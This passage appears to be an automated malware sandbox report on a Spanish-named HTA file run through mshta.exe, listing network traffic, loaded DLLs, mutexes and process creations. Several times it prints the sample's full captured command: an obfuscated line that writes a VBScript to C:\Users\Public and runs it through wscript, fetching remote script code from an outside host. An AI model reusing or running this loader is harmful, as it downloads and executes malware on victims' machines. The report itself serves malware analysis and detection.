00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484909575.0000000009538000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409811303.0000000009537000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397294287.0000000009528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.0000000009538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/j
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownHTTPS traffic detected: 142.250.189.226:443 -> 192.168.11.20:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.5.232.230:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.95.165.10:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.evad.winHTA@17/9@7/4
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C14 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C14 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C26 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C26 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C121A4F push 23FFFFFFh; retf 0_3_0C121A55
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C14 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C14 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C26 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C117C26 push ebx; iretd 0_3_0C117C1A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C121A4F push 23FFFFFFh; retf 0_3_0C121A55
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
